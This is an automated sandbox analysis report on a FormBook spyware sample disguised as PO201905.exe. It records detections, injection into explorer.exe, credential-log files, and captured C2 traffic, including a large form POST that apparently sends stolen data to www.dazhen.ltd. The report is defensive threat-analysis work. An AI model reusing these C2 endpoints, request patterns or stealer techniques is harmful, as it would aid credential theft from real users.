
Analysis Report PO201905.exe

Overview

General Information

Joe Sandbox Version: 26.0.0 Aquamarine
Analysis ID: 855421
Start date: 06.05.2019
Start time: 21:15:50
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 13m 56s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: PO201905.exe
Cookbook file name: default.jbs
Analysis system description: Windows 7 (Office 2016 v15, Java 1.8.71, Flash 20.0.0.286, Acrobat Reader 11.0.14, Internet Explorer 11, Chrome 48, Firefox 44)
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
  • HCA enabled
  • EGA enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.spyw.evad.winEXE@11/6@4/3
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 55
  • Number of non-executed functions: 73
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .exe
Warnings:
  • Max analysis timeout: 600s exceeded, the analysis took too long
  • Exclude process from analysis (whitelisted): WatAdminSvc.exe, dllhost.exe, sppsvc.exe, conhost.exe, slui.exe, WmiPrvSE.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy     Score   Range     Reporting        Whitelisted   Detection
Threshold    100     0 - 100   Report FP / FN   false         malicious

Confidence

Strategy     Score   Range   Further Analysis Required?   Confidence
Threshold    5       0 - 5   false


Classification

Analysis Advice

  • Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
  • Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
  • Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Techniques are listed per tactic column; numbers in parentheses are the counts shown next to a technique in the matrix.

Initial Access:
  • Valid Accounts
  • Replication Through Removable Media
  • Drive-by Compromise
  • Exploit Public-Facing Application
Execution:
  • Exploitation for Client Execution (1)
  • Service Execution
  • Windows Management Instrumentation
  • Scheduled Task
Persistence:
  • Registry Run Keys / Startup Folder (1)
  • Port Monitors
  • Accessibility Features
  • System Firmware
Privilege Escalation:
  • Process Injection (411)
  • Accessibility Features
  • Path Interception
  • DLL Search Order Hijacking
Defense Evasion:
  • Software Packing (1)
  • Disabling Security Tools (1)
  • Process Injection (411)
  • Obfuscated Files or Information (3)
Credential Access:
  • Credentials in Files (1)
  • Network Sniffing
  • Input Capture
  • Credentials in Files
Discovery:
  • Process Discovery (1)
  • Security Software Discovery (3)
  • Remote System Discovery (1)
  • System Information Discovery (2)
Lateral Movement:
  • Application Deployment Software
  • Remote Services
  • Windows Remote Management
  • Logon Scripts
Collection:
  • Data from Local System (1)
  • Data from Removable Media
  • Data from Network Shared Drive
  • Input Capture
Exfiltration:
  • Data Compressed
  • Exfiltration Over Other Network Medium
  • Automated Exfiltration
  • Data Encrypted
Command and Control:
  • Standard Cryptographic Protocol (1)
  • Standard Non-Application Layer Protocol (4)
  • Standard Application Layer Protocol (4)
  • Multiband Communication

Signature Overview

AV Detection:

Antivirus or Machine Learning detection for dropped file
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for sample
Source: PO201905.exe | Joe Sandbox ML: detected
Multi AV Scanner detection for dropped file
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe | virustotal: Detection: 16%
Multi AV Scanner detection for submitted file
Source: PO201905.exe | virustotal: Detection: 16%
Antivirus or Machine Learning detection for unpacked file
Source: 12.1.9rxlgd1bcduf.exe.1060000.0.unpack | Joe Sandbox ML: detected
Source: 0.1.PO201905.exe.fb0000.0.unpack | Joe Sandbox ML: detected
Source: 12.0.9rxlgd1bcduf.exe.1060000.0.unpack | Joe Sandbox ML: detected
Source: 0.2.PO201905.exe.fb0000.3.unpack | Joe Sandbox ML: detected
Source: 0.0.PO201905.exe.fb0000.0.unpack | Joe Sandbox ML: detected

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\PO201905.exe | Code function 0_2_00FCEB6B: 4x nop then pop edi
Source: C:\Users\user\Desktop\PO201905.exe | Code function 0_2_00FC66C6: 4x nop then pop edi

Networking:

HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected:
    GET /c917/?oHl4Lb5=nSCEaBLXfhTJ/xBIM1eG5VjHdYjSCo5E7UcE1As1Jcfg6SQ1mrA8W1jO4t4mCZy3/NbUbQ==&uFF4=XROl_rtXM HTTP/1.1
    Host: www.shakeitmiami.com
    Connection: close
    Data Raw: 00 00 00 00 00 00
    Data Ascii:
Source: global traffic | HTTP traffic detected:
    GET /c917/?oHl4Lb5=iGVqKJabq6qQQGosgk35PP7J8LpIY7g2/xqRC4FpH3ix1hS6w0nKWvUQXf0Fn5J++7YKhg==&uFF4=XROl_rtXM&sql=1 HTTP/1.1
    Host: www.dazhen.ltd
    Connection: close
    Data Raw: 00 00 00 00 00 00
    Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 208.91.197.91
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: the same two GET requests to www.shakeitmiami.com and www.dazhen.ltd listed under "HTTP GET or POST without a user agent" above
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: www.shakeitmiami.com
Posts data to webserver
Source: unknown | HTTP traffic detected:
    POST /c917/ HTTP/1.1
    Host: www.dazhen.ltd
    Connection: close
    Content-Length: 104865
    Cache-Control: no-cache
    Origin: http://www.dazhen.ltd
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.dazhen.ltd/c917/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 6f 48 6c 34 4c 62 35 3d 71 6b 5a 51 55 73 58 75 79 5a 79 66 42 69 5a 33 77 55 69 6d 56 4a 58 5a 39 71 64 4c 59 34 6f 56 6f 55 54 69 50 70 70 63 54 47 79 51 28 42 47 54 6e 6b 48 66 44 64 6f 64 4a 6f 41 68 69 75 63 4d 7a 6f 41 74 37 64 65 55 50 6c 35 75 50 45 4c 4f 30 50 4c 6c 63 78 66 73 46 61 47 4b 6f 47 35 43 6c 33 45 47 42 6e 31 53 43 6e 79 59 59 35 41 66 49 74 33 58 54 4d 71 46 4c 43 4c 54 54 38 44 79 56 78 7e 65 71 45 70 6e 6b 71 4f 73 75 41 47 79 49 76 62 55 4a 48 4a 45 77 6f 7e 48 44 46 44 57 6f 6d 7e 4a 48 44 28 5f 6b 32 72 52 37 50 55 38 31 71 54 44 77 38 42 4c 7a 69 6f 55 44 72 74 74 48 46 78 5f 4c 68 51 58 59 78 64 44 53 54
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: Tengine
    Content-Type: text/html; charset=utf-8
    Content-Length: 1864
    Connection: close
    Date: Mon, 06 May 2019 19:25:56 GMT
    Vary: Accept-Encoding
    Cache-Control: private
    Set-Cookie: ASP.NET_SessionId=cvf30oid01f3tnzktbph5mu3; path=/; HttpOnly
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Ali-Swift-Global-Savetime: 1557170756
    Via: cache24.l2hk71[24,404-1280,M], cache1.l2hk71[25,0], cache18.ru3[701,404-1280,M], cache6.ru3[895,0]
    X-Swift-Error: orig response 4XX error
    X-Cache: MISS TCP_MISS dirn:-2:-2
    X-Swift-SaveTime: Mon, 06 May 2019 19:25:57 GMT
    X-Swift-CacheTime: 0
    X-Swift-Error: orig response 4XX error
    Timing-Allow-Origin: *
    EagleId: 2ff6029a15571707562454862e
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 6
Urls found in memory or binary data
Source: explorer.exe, 00000006.00000000.4490786039.05A85000.00000004.sdmp | String found in binary or memory: http://go.
Source: explorer.exe, 00000006.00000000.4489219800.04C00000.00000008.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.4496745744.01F30000.00000008.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.4495461915.0037D000.00000004.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000006.00000000.4489403773.04E37000.00000004.sdmp | String found in binary or memory: http://www.autoitscript.com/favicon.ico
Source: explorer.exe, 00000006.00000000.4489403773.04E37000.00000004.sdmp | String found in binary or memory: http://www.autoitscript.com/site/autoit/

System Summary:

FormBook malware detected
Source: C:\Windows\System32\ipconfig.exe | Dropped file: C:\Users\user\AppData\Roaming\KM3N36B6\KM3logri.ini
Source: C:\Windows\System32\ipconfig.exe | Dropped file: C:\Users\user\AppData\Roaming\KM3N36B6\KM3logrv.ini
Source: C:\Program Files\Mozilla Firefox\firefox.exe | Dropped file: C:\Users\user\AppData\Roaming\KM3N36B6\KM3logrf.ini
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\PO201905.exe | Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\PO201905.exe | Code functions (function id: native calls):
  • 0_2_00FD18A8: NtAllocateVirtualMemory
  • 0_2_00FD16C8: NtCreateFile
  • 0_2_00FD17F8: NtClose
  • 0_2_00FD1778: NtReadFile
  • 0_2_00FD18A2: NtAllocateVirtualMemory
  • 0_2_00FD16C2: NtCreateFile
  • 0_2_00FD171A: NtReadFile
  • 0_2_026062E0: NtQuerySystemInformation, NtQuerySystemInformation
  • 0_2_02606360: NtQueueApcThread, NtQueueApcThread
  • 0_2_02605350: NtAdjustPrivilegesToken, NtAdjustPrivilegesToken
  • 0_2_026063E0: NtReadVirtualMemory, NtReadVirtualMemory
  • 0_2_026053C0: NtAllocateVirtualMemory, NtAllocateVirtualMemory
  • 0_2_026063A0: NtReadFile, NtReadFile
  • 0_2_02606130: NtQueryInformationProcess, NtQueryInformationProcess
  • 0_2_02606650: NtSetContextThread, NtSetContextThread
  • 0_2_026056B0: NtCreateFile, NtCreateFile
  • 0_2_026057D0: NtCreateSection, NtCreateSection
  • 0_2_026055B0: NtClose, NtClose
  • 0_2_02606590: NtResumeThread, NtResumeThread
  • 0_2_02605AC0: NtFreeVirtualMemory
  • 0_2_026058B0: NtDelayExecution, NtDelayExecution
  • 0_2_02606980: NtSuspendThread, NtSuspendThread
  • 0_2_02605D10: NtMapViewOfSection, NtMapViewOfSection
  • 0_2_02606270: NtQuerySection
  • 0_2_02606340: NtQueryVirtualMemory
  • 0_2_02606330: NtQueryValueKey
  • 0_2_02606000: NtProtectVirtualMemory
  • 0_2_02606160: NtQueryInformationToken
  • 0_2_02606100: NtQueryInformationFile
  • 0_2_026056F0: NtCreateKey
  • 0_2_02606720: NtSetInformationFile
  • 0_2_02605730: NtCreateMutant
  • 0_2_02605790: NtCreateProcessEx
  • 0_2_02605A00: NtEnumerateValueKey
  • 0_2_02606AA0: NtUnmapViewOfSection
  • 0_2_02606B50: NtWriteFile
  • 0_2_02606B00: NtWaitForSingleObject
  • 0_2_02605B00: NtGetContextThread
  • 0_2_02606B80: NtWriteVirtualMemory
  • 0_2_026068F0: NtSetValueKey
Detected potential crypto function
Source: C:\Users\user\Desktop\PO201905.exe | Code functions:
  • 0_2_00FD48FE
  • 0_2_00FC2468
  • 0_2_00FC2463
  • 0_2_00FC2422
  • 0_2_00FD5D7E
  • 0_2_00FD5603
  • 0_2_00FD4F87
  • 0_2_02630261
  • 0_2_02616258
  • 0_2_02634221
  • 0_2_025E9203
  • 0_2_02630301
  • 0_2_025C83DB
  • 0_2_025C7068
  • 0_2_0268603E
  • 0_2_026260ED
  • 0_2_025E30C9
  • 0_2_025EE0BC
  • 0_2_0266E139
  • 0_2_025D9679
  • 0_2_026907E8
  • 0_2_025EC447
  • 0_2_0261842B
  • 0_2_0268B4CF
  • 0_2_025C44E8
  • 0_2_0268548D
  • 0_2_02617495
  • 0_2_025EE5BF
  • 0_2_0261BA1C
  • 0_2_025CCB67
  • 0_2_025F3B0A
  • 0_2_025E0BBB
  • 0_2_026868E8
  • 0_2_026168DA
  • 0_2_025E3944
  • 0_2_0262291F
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\PO201905.exe | String function 025DF5FB appears 179 times
Source: C:\Users\user\Desktop\PO201905.exe | String function 0265FD8A appears 46 times
Source: C:\Users\user\Desktop\PO201905.exe | String function 025E1A8E appears 82 times
Source: C:\Users\user\Desktop\PO201905.exe | String function 02612CAC appears 53 times
PE file contains strange resources
Source: PO201905.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9rxlgd1bcduf.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9rxlgd1bcduf.exe0.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts file
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\ipconfig.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version info
Source: PO201905.exe, 00000000.00000003.4481491679.00D81000.00000004.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO201905.exe
Source: PO201905.exe, 00000000.00000002.4518101641.00200000.00000008.sdmp | Binary or memory string: OriginalFilenameMSCTF.DLL.MUIj% vs PO201905.exe
Source: PO201905.exe, 00000000.00000002.4518066485.000F0000.00000008.sdmp | Binary or memory string: OriginalFilenameuser32j% vs PO201905.exe
Source: PO201905.exe, 00000000.00000003.4508449289.00256000.00000004.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs PO201905.exe
Tries to load missing DLLs
Source: C:\Windows\System32\ipconfig.exe | Section loaded: mozglue.dll
Source: C:\Windows\System32\ipconfig.exe | Section loaded: winsqlite3.dll
Yara signature match
Matched rule: Embedded_PE (Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs)
Matched in the following sources:
  • PO201905.exe, type: SAMPLE
  • 00000006.00000000.4489812531.05280000.00000002.sdmp, type: MEMORY
  • 00000006.00000000.4489859117.053A0000.00000008.sdmp, type: MEMORY
  • 0000000C.00000000.4605949292.01060000.00000002.sdmp, type: MEMORY
  • 00000006.00000000.4499027121.02FD0000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4499136614.03160000.00000008.sdmp, type: MEMORY
  • 0000000C.00000001.4606191992.01060000.00000002.sdmp, type: MEMORY
  • 00000006.00000000.4483829349.021F0000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4489594683.04FD0000.00000002.sdmp, type: MEMORY
  • 00000006.00000000.4483813760.021E0000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4481973939.000D0000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4483543065.01C90000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4489196294.04B80000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4482978785.00960000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4485301200.02FD0000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4485257832.02F00000.00000008.sdmp, type: MEMORY
  • 00000000.00000002.4520123297.025C0000.00000040.sdmp, type: MEMORY
  • 00000000.00000002.4518783364.00FBA000.00000040.sdmp, type: MEMORY
  • 00000006.00000000.4483012656.009B0000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4496745744.01F30000.00000008.sdmp, type: MEMORY
  • 00000000.00000002.4518101641.00200000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4496645451.01C90000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4485383734.03160000.00000008.sdmp, type: MEMORY
  • 00000000.00000000.3459785508.00FB0000.00000002.sdmp, type: MEMORY
  • 00000006.00000000.4485420844.03230000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4495827412.00730000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4489866128.053E0000.00000008.sdmp, type: MEMORY
  • 00000000.00000002.4518759786.00FB0000.00000002.sdmp, type: MEMORY
  • 00000006.00000000.4496873251.020D0000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4489753137.051E0000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4489219800.04C00000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4498956019.02F00000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4495226765.000D0000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4483619954.01F30000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4498910122.02E40000.00000008.sdmp, type: MEMORY
  • 0000000C.00000002.4699103178.000E0000.00000008.sdmp, type: MEMORY
  • 00000000.00000003.4480049922.00B60000.00000004.sdmp, type: MEMORY
  • 00000006.00000000.4489600354.04FE0000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4498921613.02E50000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4489914928.05460000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4482006795.00120000.00000008.sdmp, type: MEMORY
  • 00000000.00000002.4518066485.000F0000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4496065227.00960000.00000008.sdmp, type: MEMORY
  • 00000000.00000001.3460208049.00FB0000.00000002.sdmp, type: MEMORY
  • 00000006.00000000.4489653245.050E0000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4482163480.00340000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4499198783.03230000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4495408457.00340000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4485235319.02E50000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4495818939.00720000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4483709645.020D0000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4482523631.00720000.00000008.sdmp, type: MEMORY
  • 00000000.00000003.4508449289.00256000.00000004.sdmp, type: MEMORY
  • 00000006.00000000.4499267957.03330000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4496687348.01D70000.00000008.sdmp, type: MEMORY
  • 00000006.00000000.4485229761.02E40000.00000008.sdmp, type: MEMORY
Source: 00000006.00000000.4485325684.03030000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4496894367.020E0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499078335.03090000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4497202502.021F0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4495256653.00120000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4496097002.009B0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.4700605804.000F0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483572029.01D70000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4518214232.0025C000.00000004.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499056992.03030000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485467608.03330000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4482532068.00730000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485342639.03090000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489179656.04B70000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4518110322.00210000.00000040.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4497183880.021E0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489291554.04D40000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000002.00000002.4480303987.004B0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483716872.020E0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4482412222.00680000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4495735054.00680000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499297653.033B0000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4492371223.086E0000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000003.4481262828.00CA0000.00000004.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4520262603.026A1000.00000040.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485576438.033B0000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe, type: DROPPEDMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe, type: DROPPEDMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1c90000.46.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.fb0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.5460000.36.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.340000.2.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4d40000.28.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e50000.54.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2f00000.17.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1c90000.8.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.5280000.33.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.720000.4.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.d0000.38.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3230000.22.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.960000.6.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3230000.60.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4b80000.26.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1f30000.10.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.960000.6.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1d70000.47.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e50000.54.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.9rxlgd1bcduf.exe.f0000.1.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.200000.1.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
